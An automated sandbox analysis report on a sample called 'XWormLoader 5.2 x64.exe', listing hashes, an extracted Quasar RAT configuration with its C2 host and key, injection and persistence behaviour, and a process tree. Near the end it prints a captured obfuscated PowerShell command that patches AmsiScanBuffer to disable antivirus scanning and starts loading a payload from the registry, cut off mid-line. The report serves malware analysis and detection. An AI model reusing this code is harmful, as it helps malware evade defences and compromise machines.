Analysis
- max time kernel: 150s
- max time network: 135s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 03-05-2024 17:47
Static task: static1
Behavioral task: behavioral1
- Sample: XWormLoader 5.2 x64.exe
- Resource: win10-20240404-en
Behavioral task: behavioral2
- Sample: XWormLoader 5.2 x64.exe
- Resource: win10v2004-20240419-en
General
- Target: XWormLoader 5.2 x64.exe
- Size: 329KB
- MD5: 893ee266eef0ca3b11bdb859839df69d
- SHA1: 1d2eeab0c7ae7e9ec180017d8092f23abbea6d2b
- SHA256: 40c49ccfb00bd4ca02d587af4f03823650dde39b5fe31dcde8bbdc3fa508bea3
- SHA512: 694843c573f2aeec876eaa0ef329268553cde23cc4fdced9371041c3df097eec00b44894423ee00a7c9a1444f0bb17a089cb48c5430dfdaafa1265e5cd1b85f5
- SSDEEP: 6144:HfPtIkJwV7LtIgxfUFdLdassJFxgXS+vK5Qav9qm:HflXJwFmmUFdLs9H51
Malware Config
Extracted
- Family: quasar
- Version: 3.1.5
- Botnet: SLAVE
- C2: even-lemon.gl.at.ply.gg:33587
- Mutex: $Sxr-3vDee7FzoJnhqjuE3n
- Attributes:
  - encryption_key: AqYe7s30CMq7SVM0oxKR
  - install_name: Discord.exe
  - log_directory: Logs
  - reconnect_delay: 1000
  - startup_key: Discord
  - subdirectory: Discord
Signatures
- Quasar payload 2 IoCs
  Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\svchost.exe | family_quasar
  behavioral1/memory/4644-17-0x00000000008F0000-0x000000000095C000-memory.dmp | family_quasar
- Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  Processes:
  description | pid | process | target process
  PID 4708 created 584 | 4708 | powershell.EXE | winlogon.exe
  PID 1456 created 584 | 1456 | powershell.EXE | winlogon.exe
- Downloads MZ/PE file
- Executes dropped EXE 5 IoCs
  Processes:
  pid | process
  4644 | svchost.exe
  4908 | XWormLoader 5.2 x32.exe
  1224 | Discord.exe
  2120 | install.exe
  4316 | install.exe
- Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  Processes:
  flow | ioc
  9 | raw.githubusercontent.com
  10 | raw.githubusercontent.com
  19 | raw.githubusercontent.com
- Looks up external IP address via web service 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
  flow | ioc
  4 | ip-api.com
- Drops file in System32 directory 8 IoCs
  Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
  File opened for modification | C:\Windows\System32\Tasks\$77Discord.exe | svchost.exe
  File opened for modification | C:\Windows\System32\Tasks\$77svc64 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | OfficeClickToRun.exe
- Suspicious use of SetThreadContext 2 IoCs
  Processes:
  description | pid | process | target process
  PID 4708 set thread context of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 1456 set thread context of 4328 | 1456 | powershell.EXE | dllhost.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- Program crash 1 IoCs
  Processes:
  pid | pid_target | process | target process
  4224 | 4908 | WerFault.exe | XWormLoader 5.2 x32.exe
- Creates scheduled task(s) 1 TTPs 4 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes:
  pid | process
  4668 | schtasks.exe
  4928 | SCHTASKS.exe
  1688 | schtasks.exe
  4320 | SCHTASKS.exe
- Modifies data under HKEY_USERS 64 IoCs
  Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
  Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5EBEFE70-DFDA-4E14-92CD-1F42C9391953}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
- Runs ping.exe 1 TTPs 1 IoCs
- Suspicious behavior: EnumeratesProcesses 64 IoCs
  Processes (64 entries, grouped by process):
  pid | process | entries
  4708 | powershell.EXE | 4
  4472 | dllhost.exe | 56
  1224 | Discord.exe | 4
- Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  Processes:
  pid | process
  3396 | Explorer.EXE
- Suspicious use of AdjustPrivilegeToken 35 IoCs
  Processes:
  description | pid | process
  Token: SeDebugPrivilege | 4644 | svchost.exe
  Token: SeDebugPrivilege | 4708 | powershell.EXE
  Token: SeDebugPrivilege | 1224 | Discord.exe
  Token: SeDebugPrivilege | 4708 | powershell.EXE
  Token: SeDebugPrivilege | 4472 | dllhost.exe
  Token: SeAuditPrivilege | 2472 | svchost.exe
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeDebugPrivilege | 1456 | powershell.EXE
  Token: SeDebugPrivilege | 1456 | powershell.EXE
  Token: SeDebugPrivilege | 4328 | dllhost.exe
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
  Token: SeShutdownPrivilege | 3396 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3396 | Explorer.EXE
- Suspicious use of WriteProcessMemory 64 IoCs
  Processes:
  description | pid | process | target process
  PID 2452 wrote to memory of 4644 | 2452 | XWormLoader 5.2 x64.exe | svchost.exe
  PID 2452 wrote to memory of 4644 | 2452 | XWormLoader 5.2 x64.exe | svchost.exe
  PID 2452 wrote to memory of 4644 | 2452 | XWormLoader 5.2 x64.exe | svchost.exe
  PID 2452 wrote to memory of 4908 | 2452 | XWormLoader 5.2 x64.exe | XWormLoader 5.2 x32.exe
  PID 2452 wrote to memory of 4908 | 2452 | XWormLoader 5.2 x64.exe | XWormLoader 5.2 x32.exe
  PID 2452 wrote to memory of 4908 | 2452 | XWormLoader 5.2 x64.exe | XWormLoader 5.2 x32.exe
  PID 4644 wrote to memory of 4668 | 4644 | svchost.exe | schtasks.exe
  PID 4644 wrote to memory of 4668 | 4644 | svchost.exe | schtasks.exe
  PID 4644 wrote to memory of 4668 | 4644 | svchost.exe | schtasks.exe
  PID 4644 wrote to memory of 1224 | 4644 | svchost.exe | Discord.exe
  PID 4644 wrote to memory of 1224 | 4644 | svchost.exe | Discord.exe
  PID 4644 wrote to memory of 1224 | 4644 | svchost.exe | Discord.exe
  PID 4644 wrote to memory of 2120 | 4644 | svchost.exe | install.exe
  PID 4644 wrote to memory of 2120 | 4644 | svchost.exe | install.exe
  PID 4644 wrote to memory of 2120 | 4644 | svchost.exe | install.exe
  PID 4644 wrote to memory of 4928 | 4644 | svchost.exe | SCHTASKS.exe
  PID 4644 wrote to memory of 4928 | 4644 | svchost.exe | SCHTASKS.exe
  PID 4644 wrote to memory of 4928 | 4644 | svchost.exe | SCHTASKS.exe
  PID 1224 wrote to memory of 1688 | 1224 | Discord.exe | schtasks.exe
  PID 1224 wrote to memory of 1688 | 1224 | Discord.exe | schtasks.exe
  PID 1224 wrote to memory of 1688 | 1224 | Discord.exe | schtasks.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4708 wrote to memory of 4472 | 4708 | powershell.EXE | dllhost.exe
  PID 4472 wrote to memory of 584 | 4472 | dllhost.exe | winlogon.exe
  PID 4472 wrote to memory of 640 | 4472 | dllhost.exe | lsass.exe
  PID 4472 wrote to memory of 740 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 904 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 992 | 4472 | dllhost.exe | dwm.exe
  PID 4472 wrote to memory of 368 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 372 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 592 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1096 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1108 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1184 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1216 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1236 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1252 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1396 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1428 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1472 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1540 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1580 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1600 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1680 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1720 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1756 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1772 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1848 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1856 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 1940 | 4472 | dllhost.exe | spoolsv.exe
  PID 4472 wrote to memory of 1992 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 2144 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 2236 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 2472 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 2492 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 2580 | 4472 | dllhost.exe | sihost.exe
  PID 4472 wrote to memory of 2588 | 4472 | dllhost.exe | svchost.exe
  PID 4472 wrote to memory of 2660 | 4472 | dllhost.exe | svchost.exe
Processes (each entry: image path | cmdline | tree depth | PID; children are indented under their parent)
- C:\Windows\system32\winlogon.exe | cmdline: winlogon.exe | depth 1 | PID:584
  - C:\Windows\system32\dwm.exe | cmdline: "dwm.exe" | depth 2 | PID:992
  - C:\Windows\System32\dllhost.exe | cmdline: C:\Windows\System32\dllhost.exe /Processid:{b7ed216d-36c9-4799-9373-e801882d34a0} | depth 2 | PID:4472
    signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\dllhost.exe | cmdline: C:\Windows\System32\dllhost.exe /Processid:{2e2f3f37-3868-43d0-99a9-e46554d2d109} | depth 2 | PID:4328
    signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\lsass.exe | cmdline: C:\Windows\system32\lsass.exe | depth 1 | PID:640
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay | depth 1 | PID:740
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM | depth 1 | PID:904
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc | depth 1 | PID:368
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts | depth 1 | PID:372
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService | depth 1 | PID:592
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog | depth 1 | PID:1096
- c:\windows\system32\svchost.exe | cmdline: c:\windows\system32\svchost.exe -k netsvcs -s Schedule | depth 1 | PID:1108
  signatures: Drops file in System32 directory
  - c:\windows\system32\taskhostw.exe | cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} | depth 2 | PID:2876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kDafqIzcVOZr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$dNJlpaIqkcJJOz,[Parameter(Position=1)][Type]$MYcnqmmqBr)$yOpGEbWgkBi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+''+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+'S'+'e'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$yOpGEbWgkBi.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$dNJlpaIqkcJJOz).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+'d');$yOpGEbWgkBi.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke','P'+'u'+''+
[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'H'+[Char](105)+''+[Char](100)+'eBy'+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+'l'+'o'+''+'t'+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$MYcnqmmqBr,$dNJlpaIqkcJJOz).SetImplementationFlags(''+'R'+''+'u'+''+'n'+'ti'+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $yOpGEbWgkBi.CreateType();}$tnmxbiJhbugcG=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+'a'+'tiv'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$igKlxdWSgQjiSu=$tnmxbiJhbugcG.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+'ro'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](83)+'t'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YZNYqkjNuIGkcAYiiRk=kDafqIzcVOZr @([String])([IntPtr]);$EwWqUOKINAEcWwSeVRgfKU=kDafqIzcVOZr 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FrfownYyaSe=$tnmxbiJhbugcG.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'el'+'3'+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')));$jWDCycmIrTcRTW=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$FrfownYyaSe,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$APlxsjdhGyvfAmovr=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$FrfownYyaSe,[Object]('V'+'i'+'rt'+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$BSwitSz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jWDCycmIrTcRTW,$YZNYqkjNuIGkcAYiiRk).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+'.'+[Char](100)+'ll');$bLpawPucSezYJCSSI=$igKlxdWSgQjiSu.Invoke($Null,@([Object]$BSwitSz,[Object](''+'A'+''+[Char](109)+'siSc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$whOefGtDTQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APlxsjdhGyvfAmovr,$EwWqUOKINAEcWwSeVRgfKU).Invoke($bLpawPucSezYJCSSI,[uint32]8,4,[ref]$whOefGtDTQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bLpawPucSezYJCSSI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APlxsjdhGyvfAmovr,$EwWqUOKINAEcWwSeVRgfKU).Invoke($bLpawPucSezYJCSSI,[uint32]8,0x20,[ref]$whOefGtDTQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+